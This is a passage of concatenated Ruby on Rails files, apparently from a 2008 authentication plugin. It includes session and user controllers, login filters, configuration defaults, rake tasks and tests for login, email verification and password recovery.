    assert_equal @user, @kls.send(:current_user)
  end
  it 'should have a filter to require login' do
    # nasty, but we're not in a real controller
    @kls.stubs(:session).returns({})
    @kls.stubs(:params).returns({})
    @kls.stubs(:new_session_url).returns('NEW_SESSION_URL')
    # an anonymous request should be bounced to the login page
    @kls.expects(:redirect_to).with('NEW_SESSION_URL')
    @kls.send(:require_login)
  end
end
# Class-level behavior of the login filters mixin.
# (Fixes the typo "incliding" in the test description.)
context 'A class including the login filters', ActiveSupport::TestCase do
  setup do
    class Kls < ActionController::Base ; include UserSystemLoginFilters ; end
    @kls = Kls
    @user = Factory(:user)
  end
  it 'can request only certain users to have access to controller' do
    # only_for_user should install a before_filter restricting access
    @kls.expects(:before_filter)
    @kls.send(:only_for_user, @user)
  end
end
<file_sep># Copyright (c) 2008 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
require File.join(File.dirname(__FILE__), '..', 'user_system_test_helper')
# because this is an implementation detail, dont rely on it. move it to func
# Assert that someone is logged in; when a specific user is given, assert
# that the session belongs to exactly that user.  Relies on the
# session[:user_id] implementation detail noted above.
def assert_logged_in specific_user=nil
  return assert(session[:user_id]) unless specific_user
  assert_equal specific_user.id, session[:user_id]
end
# Assert that no user is associated with the current session.
def assert_not_logged_in
  assert_equal nil, session[:user_id]
end
# Functional tests for SessionsController (login / logout).
# NOTE(review): every xit test is disabled, and the '<PASSWORD>' literals
# look like placeholders left by a repository sanitizer -- these tests
# cannot pass until real fixture passphrases are restored.
context 'Sessions Controller', ActionController::TestCase do
  setup do
    @controller = SessionsController.new
    @request = ActionController::TestRequest.new
    @response = ActionController::TestResponse.new
    @user = Factory(:user)
    @user.verify!
  end
  xit 'should log a valid user in with create' do
    post 'create', :session => {:login => 'chester', :passphrase => '<PASSWORD>'}
    assert_logged_in @user
  end
  xit 'should log in a disabled user, but sandbox them' do
    @user.disable!
    post 'create', :session => {:login => 'chester', :passphrase => '<PASSWORD>'}
    assert_logged_in
    # disabled users still authenticate but land on an information page
    assert_redirected_to inform_disabled_user_path(@user)
  end
  xit 'should not log in a user with improper credentials' do
    post 'create', :session => {:login => 'chester', :passphrase => '<PASSWORD>'}
    assert_not_logged_in
  end
  xit 'should log out user with destroy' do
    @request.session[:user_id] = @user.id
    post 'destroy'
    assert_not_logged_in
  end
  context 'If verify_emails is on', ActionController::TestCase do
    setup do
      # NOTE(review): global config is mutated without teardown; later
      # tests in the suite may observe verify_email == true.
      UserSystem.verify_email = true
    end
    xit 'should not log in an unverified email' do
      @user.update_attribute :verified, false
      post 'create', :session => {:login => 'chester', :passphrase => '<PASSWORD>'}
      assert_not_logged_in
    end
  end
end
<file_sep># Copyright (c) 2008 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
##
#
# == Overview
#
# SessionsController performs authentication and is configurable by
# writing some inheritable attributes or by inheriting from it.
#
# Most of the heavy lifting is done in UserAuthentication, which looks
# at the configuration you specify and calls into the appropriate
# authentication backend.
#
# It is possible to have many subclasses of SessionsController in your
# application, each providing a different mechanism for authentication.
#
# == Example of single authentication endpoint
#
# Example using an initializer to set authentication mechanism, in
# this case using twitter oauth authentication to access the site:
#
# <tt>config/initializers/session_auth.rb</tt>
#
# SessionsController.write_inheritable_attribute(
# :auth_module,
# UserSystem::TwitterOauth::Authentication
# )
#
# == Adding a second authentication endpoint
#
# Example using a subclass to provide an authentication mechanism, in this
# case using a single sign on server:
#
# <tt>app/controllers/sso_sessions_controller.rb</tt>
#
# class SsoSessionsController < SessionsController
# write_inheritable_attribute(:auth_module, Sso::UserSystemAuthentication)
# end
#
# == Example of directing different controllers to different endpoints
#
# Example telling InternalDataController to use SsoSessionsController, and
# MemberDataController will still use SessionsController.
#
# class InternalDataController < ApplicationController
# write_inheritable_attribute(
# :login_url_helper,
# :new_sso_sessions_path
# )
# write_inheritable_attribute(
# :login_post_url_helper,
# :sso_sessions_path
# )
# write_inheritable_attribute(
# :login_template,
# '/sso_auth/new'
# )
# end
#
# == Creating an auth module
#
# Auth modules that SessionsController use for authentication should provide
# a self.login(this_controller) method. There are a number of methods in
# the calling controller that it can make use of:
#
# * this_controller.params
#
# From UserAuthentication
# * this_controller.send(:user_scope)
#
# From UserSystemLoginFilters
# * this_controller.send(:session_model_for_this_controller)
# * this_controller.send(:user_model_for_this_controller)
#
# == Authenticating from a different model
#
# class PhysicianDocumentsController < ApplicationController
# write_inheritable_attribute(
# :login_url_helper,
# :new_physician_sessions_path
# )
# write_inheritable_attribute(
# :login_post_url_helper,
# :physician_sessions_path
# )
# write_inheritable_attribute(
# :user_model,
# :physician
# )
# end
#
# class PhysicianSessionsController < SessionsController
# write_inheritable_attribute(
# :user_model,
# :physician
# )
# end
#
class SessionsController < ApplicationController
  # The login actions must be reachable by anonymous visitors.
  skip_before_filter :require_login

  # DEFAULT CONFIGURATION
  # self.auth_module = PasswordAuthentication
  # self.session_model = Session
  # self.user_model = User
  # self.login_url = nil
  # self.login_url_helper = :sessions_url
  # self.login_template = '/sessions/new'
  include UserAuthentication
  include UserRedirect

  # GET: render the login form configured for this controller.
  def new
    render :template => login_template_for_this_controller
  end

  # POST: delegate authentication to the configured auth module (via
  # UserAuthentication's create_session).  On success, remember the
  # session and user ids and hand off to UserRedirect; on failure,
  # re-render the login form with an error flash.
  def create
    if s = create_session
      session[:session_id] = s.id
      session[:user_id] = s.user_id
      user_redirect(s.user)
    else
      flash.now[:error] = "Unable to login. " +
        "Ensure your login name and passphrase are correct. " +
        "Passphrases are case-sensitive"
      render :template => login_template_for_this_controller
    end
  end

  # Log out: drop the ids from the Rails session and show the login
  # form again (renders rather than redirects).
  def destroy
    session[:session_id] = nil
    session[:user_id] = nil
    render :template => login_template_for_this_controller
  end
  # 'end' is only a legal action name when created via alias.
  alias :end :destroy
end
<file_sep>class RemoveUnusedUserFields < ActiveRecord::Migration
def self.up
if User.columns.detect{|x| x.name == 'passphrase'}
remove_column User.table_name, :passphrase
remove_column User.table_name, :reset_passphrase
end
end
def self.down
# do nothing, it is smart enough to skip when unneeded
end
end
<file_sep>#
#
# Tries each registered authentication module in order until one of them
# successfully authenticates the controller's request.
#
# You can have an initializer like
# ChainedAuthenticationModule.auth_chain << UrlTokenAuthentication
# ChainedAuthenticationModule.auth_chain << PasswordAuthentication
# ChainedAuthenticationModule.auth_chain << LocalDevAuth
# SessionsController.auth_module = ChainedAuthenticationModule
#
module ChainedAuthenticationModule
  @@auth_chain = []

  # Expose the chain so initializers can append authentication modules as
  # shown above.  (Previously missing, so the documented usage raised
  # NoMethodError.)
  def self.auth_chain
    @@auth_chain
  end

  # Returns the first auth module whose +login+ succeeds (detect yields
  # the module itself, not login's return value), or nil if none do.
  # Fixed: the original called x.loign (typo), which always raised.
  def self.login controller
    @@auth_chain.detect{|x| x.login(controller) }
  end
end
<file_sep># Copyright (c) 2008 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
begin
require 'rcov/rcovtask'
rescue LoadError
# do nothing
end
# Rake tasks for the UserSystem plugin: migrations, test runners, and
# (when rcov loaded above) coverage analysis.
namespace :user_system do
  desc "Run migrations for the UserSystem Extension"
  task :migrate => :environment do
    require File.join(File.dirname(__FILE__), '..', '..', 'db', 'user_system_migrator')
    # Honor VERSION=n on the command line, like the stock db:migrate task.
    UserSystemMigrator.migrate(File.join(File.dirname(__FILE__), '..', '..', 'db', 'migrate'), ENV['VERSION'] ? ENV['VERSION'].to_i : nil)
  end

  desc 'Test the UserSystem Extension.'
  Rake::TestTask.new(:test) do |t|
    # pull in the host application's test helper before our tests run
    t.ruby_opts << "-r#{Rails.root}/test/test_helper"
    t.libs << File.join(File.dirname(__FILE__), '..', 'lib')
    t.pattern = File.join(File.dirname(__FILE__), '..', 'test/**/*_test.rb')
    t.verbose = true
  end

  desc 'Test the UserSystem Extension (only unit tests).'
  Rake::TestTask.new('test:units') do |t|
    t.ruby_opts << "-r#{Rails.root}/test/test_helper"
    t.libs << File.join(File.dirname(__FILE__), '..', 'lib')
    t.pattern = File.join(File.dirname(__FILE__), '..', 'test/unit/*_test.rb')
    t.verbose = true
  end

  desc 'Test the UserSystem Extension (only functional tests).'
  Rake::TestTask.new('test:functionals') do |t|
    t.ruby_opts << "-r#{Rails.root}/test/test_helper"
    t.libs << File.join(File.dirname(__FILE__), '..', 'lib')
    t.pattern = File.join(File.dirname(__FILE__), '..', 'test/functional/*_test.rb')
    t.verbose = true
  end

  # Only defined when the rcov gem loaded successfully at the top of
  # the file.
  if defined?(Rcov)
    desc 'Run code coverate analysis'
    Rcov::RcovTask.new do |t|
      require 'rbconfig'
      t.pattern = File.join(File.dirname(__FILE__), '..', 'test', '**', '*_test.rb')
      t.verbose = true
      # Exclude every sibling plugin, plus rails/config/test directories,
      # so coverage only measures this plugin's own code.
      # NOTE(review): Config::CONFIG is the pre-1.9 name for RbConfig::CONFIG.
      myname = File.dirname(__FILE__).split('/')[-2]
      op = Dir[File.dirname(__FILE__) + '/../../*'].map{|x| File.basename(x)}
      op.reject!{|x| x == myname}
      unless op.empty?
        op = op.join(',')
        xo = "--exclude-only #{Config::CONFIG['prefix']},config,environment,vendor/rails,#{op},ext_lib,test"
      else
        xo = "--exclude-only #{Config::CONFIG['prefix']},config,environment,vendor/rails,ext_lib,test"
      end
      t.rcov_opts = [xo]
    end
  end
end
<file_sep># Copyright (c) 2008 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# Central configuration switches for the user system.  Each setting is a
# module attribute with a default; override in an initializer, e.g.
#   UserSystem.verify_email = true
module UserSystem
  # setting name => default value
  DEFAULTS = {
    :public_account_creation => true,            # anyone may sign up
    :email_is_login => false,                    # email address doubles as login name
    :verify_email => false,                      # require email verification
    :require_email => false,                     # email must be present regardless
    :always_generate_security_token => false,
    :user_messenger_from => "nobody@localhost",  # From: address for system mail
    :site_name => "My Rails Site",
    :root_url => "localhost",
    :default_path => nil,                        # e.g. '/dashboards' or :dashboards_path
    # alphabet used when generating security tokens
    :security_token_characters => ('A'..'Z').to_a +
      ('a'..'z').to_a +
      ('0'..'9').to_a +
      ['-', '_', '!', '~'],
    :minimum_security_token_length => 30,
    :maximum_security_token_length => 50
  }

  # Define an accessor for every setting and seed it with its default.
  DEFAULTS.each do |setting, default_value|
    mattr_accessor setting
    send("#{setting}=", default_value)
  end
end
<file_sep># Copyright (c) 2008 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
require File.join(File.dirname(__FILE__), '..', 'user_system_test_helper')
# Model-level tests for User: login casing rules, login uniqueness, and the
# email_is_login / verify_email / require_email configuration switches.
# (xit marks a disabled test.)
context 'User', ActiveSupport::TestCase do
  setup do
    @user = Factory(:user)
  end

  it 'can change login case' do
    @user.login = 'ChEsTeR'
    assert_equal 'ChEsTeR', @user.login
    @user.save && @user.reload
    assert_equal 'ChEsTeR', @user.login
  end

  it 'cannot change login, except for case' do
    @user.login = 'totally_new_login'
    assert_equal 'chester', @user.login
  end

  it 'will not be valid if another user has the same login (case insensitive)' do
    u = Factory.build(:user, :email => '<EMAIL>', :login => 'cHESTER')
    u.valid?
    assert u.errors.on(:login)
  end

  xit 'should login regardless of login case given' do
    assert User.login(:login => 'CHESTer', :passphrase => '<PASSWORD>')
  end

  context 'With configuration email_is_login', ActiveSupport::TestCase do
    setup do
      UserSystem.email_is_login = true
    end
    it 'should not create account without giving an email' do
      user = Factory.build(:user, :email => nil)
      user.valid?
      assert (user.errors.on(:email) || user.errors.on(:login))
    end
    xit 'should login with an email' do
      assert User.login(:login => '<EMAIL>', :passphrase => '<PASSWORD>')
    end
  end

  context 'Without configuration email_is_login', ActiveSupport::TestCase do
    setup do
      User.delete_all
      UserSystem.email_is_login = false
    end
    xit 'should perform login without giving email adress' do
      Factory(:user)
      assert User.login(:login => 'chester', :passphrase => '<PASSWORD>')
    end
    it 'cannot create an account without giving a login' do
      user = Factory.build(:user, :login => nil)
      user.valid?
      assert user.errors.on(:login)
    end

    context 'With configuration verify email', ActiveSupport::TestCase do
      setup do
        UserSystem.verify_email = true
      end
      it 'cannot create an account without giving an email' do
        user = Factory.build(:user, :email => nil)
        user.valid?
        assert user.errors.on(:email)
      end
    end

    context 'Without configuration verify email', ActiveSupport::TestCase do
      setup do
        User.delete_all
        UserSystem.verify_email = false
      end

      context 'With configuration require email', ActiveSupport::TestCase do
        setup do
          UserSystem.require_email = true
        end
        it 'can not create an account without giving an email' do
          user = Factory.build(:user, :email => nil)
          user.valid?
          assert user.errors.on(:email)
        end
      end

      context 'Without configuration require email', ActiveSupport::TestCase do
        setup do
          UserSystem.require_email = false
        end
        it 'can create an account without giving an email' do
          user = Factory.build(:user, :email => nil)
          assert user.valid?
        end
      end
    end
  end

  context 'With configuration verify_email', ActiveSupport::TestCase do
    setup do
      UserSystem.verify_email = true
    end
    it 'should unverify email when email changes' do
      assert @user.verified?
      @user.email = '<EMAIL>'
      assert !@user.verified?
    end
  end
end
<file_sep># Copyright (c) 2008 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# Create user accounts with this.
#
# Plugins can extend the forms with view_extender. See the view files and
# the view_extender documentation for more information.
#
class UsersController < ApplicationController
  skip_before_filter :require_login
  include UserRedirect

  # Signup actions are only reachable when public account creation is on.
  before_filter :account_creation_should_be_enabled,
                :only => [ :new, :create ]
  # Token-based actions must receive a non-empty token in params[:id].
  before_filter :security_token_is_not_nil,
                :only => [ :verify, :perform_recovery ]

  #
  # show the form to create a new user
  #
  def new
    @user = User.new
    respond_to :html
  end

  #
  # Create a user record
  #
  def create
    u = User.create(params[:user])
    # User.create returns the (unsaved) record on validation failure;
    # re-render the form with errors in that case.
    if u.new_record?
      respond_to do |format|
        format.html do
          flash[:notice] = 'Unable to create user'
          @user = u
          render :action => 'new'
        end
      end
      return
    end

    # send verification email
    if UserSystem.verify_email
      UserMessenger.deliver_verification(u)
    end

    respond_to do |format|
      format.html do
        user_redirect(u)
      end
    end
  end

  #
  # A link to this action is delivered in an email upon signup.
  # By visiting it, the account becomes active.
  #
  def verify
    user = User.find_by_security_token(params[:id])
    unless user
      respond_to do |format|
        format.html do
          flash.now[:notice] = "Invalid verification code"
        end
      end
      return
    end
    user.update_attribute :verified, true
    respond_to do |format|
      format.html do
        user_redirect(user)
      end
    end
  end

  #
  # Ask the user to verify their email address.
  # TODO make sure user verification is turned on
  # TODO make sure they are not already verified
  #
  def request_verification
    if params[:send_email]
      @user = User.find_by_email(params[:verification][:email])
      if @user
        UserMessenger.deliver_verification @user
      end
    end
    respond_to :html
  end

  #
  # User can provide their email address to have their password reset and
  # sent to them.
  #
  def send_recovery
    @user = User.find_by_email(params[:user][:email])
    unless @user
      respond_to do |format|
        format.html do
          flash[:error] = "Unable to find email address " +
                          "#{params[:user][:email]}"
          render :action => 'recover'
        end
      end
      return
    end
    # The security token doubles as the recovery link; expire it quickly.
    @user.update_security_token! 20.minutes
    # @user.update_attribute :reset_passphrase, true
    UserMessenger.deliver_recovery(@user)
    respond_to :html
  end

  #
  # User has been sent an email because they forgot their password and
  # were sent back here. Give them their account.
  #
  def perform_recovery
    user = User.for_security_token(params[:id])
    respond_to do |format|
      # html #
      format.html do
        if user
          user_redirect(user)
          session[:user_id] = user.id
        else
          flash[:notice] = 'Invalid or expired token'
          redirect_to recover_users_path
        end
      end
      # other formats #
    end
  end

  private

  # Respond 404 unless the application allows self-service signup.
  # FIX: corrected user-facing typo "disbaled" -> "disabled".
  def account_creation_should_be_enabled
    unless UserSystem.public_account_creation
      render :text => 'Public account creation is disabled', :status => 404
    end
  end

  # Guard token actions against a blank token, which could otherwise match
  # records with an empty security token.
  def security_token_is_not_nil
    if params[:id].nil? or params[:id].empty?
      raise ActiveRecord::RecordNotFound
    end
  end
end
<file_sep>#
# UserAuthentication provides a method create_session to the included class
# that will build and return a session model.
#
# There are three knobs to tweak to modify behavior per-controller.
# auth_module: #login(self) will be called on this class to get back user || nil
# user_model: the class to use to find the user
# session_model: the returned class
#
# Any user-compatible model will define an authentication_scope method. Other
# plugins may use it to restrict access. It will return something responding
# to .find(), like an ActiveRecord model or scope.
#
module UserAuthentication
  private

  # Build and return a session model for this request by delegating to the
  # controller's configured authentication module (auth_module.login(self)).
  # Raises when no authentication module has been configured.
  def create_session
    auth_module = self.class.send(:auth_module_for_this_controller)
    if auth_module
      auth_module.login(self)
    else
      raise "Unconfigured UserSystem -- needs authentication module"
    end
  end

  # Scope used to look up users for this controller; delegates to the user
  # model's authentication_scope so other plugins may restrict access.
  def user_scope
    user = self.class.send(:user_model_for_this_controller)
    user.authentication_scope
  end
end
<file_sep># Copyright (c) 2008 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
require File.join(File.dirname(__FILE__), '..', 'user_system_test_helper')
# Functional tests for UsersController: signup, email verification, and
# the password-recovery flow (token issue / expiry).
context 'Users Controller', ActionController::TestCase do
  setup do
    @controller = UsersController.new
    @request = ActionController::TestRequest.new
    @response = ActionController::TestResponse.new
    @user = Factory(:user, :verified => true)
  end

  it 'should show the form with "new" action' do
    get 'new'
    assert_response 200
  end

  it 'should send password recovery via email' do
    UserMessenger.expects(:deliver_recovery)
    post 'send_recovery', {:user => {:email => @user.email} }
    assert_response 200
  end

  it 'should allow password recovery within a limited time range' do
    UsersController.any_instance.expects(:user_redirect)
    @user.update_security_token!
    get 'perform_recovery', :id => @user.security_token
  end

  it 'should not allow password recovery if request for recovery long ago' do
    # issue a token that is already expired
    @user.update_security_token! -1.days
    get 'perform_recovery', :id => @user.security_token
    assert_redirected_to recover_users_url, flash.inspect
  end

  context 'With email verification turned on', ActionController::TestCase do
    setup do
      UserSystem.verify_email = true
      @user.update_attribute :verified, false
    end
    it 'should verify the account with "verify" action' do
      get 'verify', {:id => @user.security_token}
      @user.reload
      assert @user.verified?
    end
  end

  context 'With public account creation', ActionController::TestCase do
    setup do
      UserSystem.public_account_creation = true
    end
    it 'should allow creation if public account creation is turned on' do
      @user.destroy
      post 'create', :user => atr = Factory.attributes_for(:user)
      atr.symbolize_keys!
      assert User.login(:login => atr[:login], :passphrase => atr[:passphrase])
    end
  end

  context 'Without public account creation', ActionController::TestCase do
    setup do
      UserSystem.public_account_creation = false
    end
    it 'should not allow user creation' do
      @user.destroy
      post 'create', :user => atr = Factory.attributes_for(:user)
      assert_response 404
    end
  end
end
<file_sep>require File.join(File.dirname(__FILE__), '..', 'user_system_test_helper')
require File.join(File.dirname(__FILE__), '..', '..', 'lib', 'user_redirect')
# Tests for the UserRedirect mixin's on_redirection callback chain, including
# callbacks registered after the module has already been included once.
context 'A class including UserRedirect', ActiveSupport::TestCase do
  setup do
    class M < ActionController::Base
      include UserRedirect
    end
    @kls = M.new
    @kls.session = {}
    @kls.request = ActionController::TestRequest.new
    @kls.response = ActionController::TestResponse.new
    @user = Factory(:user)
    @user.verified = true
  end

  it 'should not have an empty callback chain' do
    assert !M.on_redirection_callback_chain.empty?
  end

  it 'should walk through callbacks when redirecting' do
    M.on_redirection_callback_chain.each{|c| @kls.expects(c.method) }
    @kls.stubs(:root_path).returns('/')
    @kls.send(:user_redirect, @user)
  end

  it 'should not call callbacks after one redirects' do
    @user.verified = false
    @kls.expects(:inform_disabled).never
  end

  context 'that has more callbacks added after included once', ActiveSupport::TestCase do
    setup do
      module Ext
        def new_callback
          # no op
        end
      end
      UserRedirect.send :include, Ext
      UserRedirect.send :on_redirection, :new_callback
    end
    it 'should add new callbacks to old include' do
      assert M.on_redirection_callback_chain.detect{|x| x.method == :new_callback}
    end
    it 'should add all callbacks to new include' do
      class C2 < ActionController::Base
        include UserRedirect
      end
      assert C2.on_redirection_callback_chain.detect{|x| x.method == :new_callback}
    end
  end
end
<file_sep># Copyright (c) 2008 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# Controller mixin providing login filters (require_login / only_for_user)
# and per-controller configuration of the user/session/auth models via
# inheritable attributes.
module UserSystemLoginFilters
  private

  # Inclusion hook: add the class-level helpers and expose current_user to
  # the view layer.
  def self.included(kls)
    kls.send :extend, ClassMethods
    kls.send :helper_method, :current_user
  end

  #
  # So any controller can call current_user to get the logged in user
  #
  def current_user
    @usys_logged_in_user ||= lookup_user
  end

  #
  # This is the fallback case. It can be alias-chained by other plugins.
  # Looks the session record up by session[:session_id] and returns its user
  # (or nil when there is no matching session).
  #
  def lookup_user
    self.class.send(:session_model_for_this_controller).find_by_id(
      session[:session_id]
    ).try(:user)
  end

  #
  # Make sure a user is stored in the session.
  # before_filter :require_login
  #
  def require_login
    unless current_user
      # remember where the user was headed so login can resume it
      session[:last_params] = params
      redirect_to login_url_for_this_controller
      return
    end
    validate_user(current_user)
  end

  #
  # This method is used internally by only_for_user class method
  #
  def require_user_login *valid_users
    if !current_user or (!valid_users.empty? and !valid_users.include?(current_user))
      # TODO: if current_user, but not valid, use 403, otherwise 401
      session[:last_params] = params
      flash[:notice] = 'You need to login to proceed.'
      redirect_to login_url_for_this_controller
      return
    else
      true
    end
  end

  # Login-form URL: per-controller static value or helper, defaulting to
  # new_session_url.
  def login_url_for_this_controller
    rv = self.class.read_inheritable_attribute(:login_url)
    if h=self.class.read_inheritable_attribute(:login_url_helper)
      rv = self.send(h)
    end
    rv ||= new_session_url
    rv
  end

  # URL the login form posts to, defaulting to sessions_url.
  def login_post_url_for_this_controller
    rv = self.class.read_inheritable_attribute(:login_post_url)
    if h=self.class.read_inheritable_attribute(:login_post_url_helper)
      rv = self.send(h)
    end
    rv ||= sessions_url
    rv
  end

  # Template rendered for the login form.
  def login_template_for_this_controller
    rv = self.class.read_inheritable_attribute(:login_template)
    rv ||= "/sessions/new"
    rv
  end

  module ClassMethods
    #
    # Mark this controller (or certain actions using :only => ...)
    # as protected and only accessible for certain users.
    #
    def only_for_user *users
      options = users.last.is_a?(Hash) ? users.pop : {}
      _users = users.collect{|x| userify(x) }
      before_filter(options) do |inst|
        inst.send :require_user_login, *_users
      end
    end

    private

    # internal helper: coerce a string into a model instance via the given
    # finder, passing instances of model_class straight through
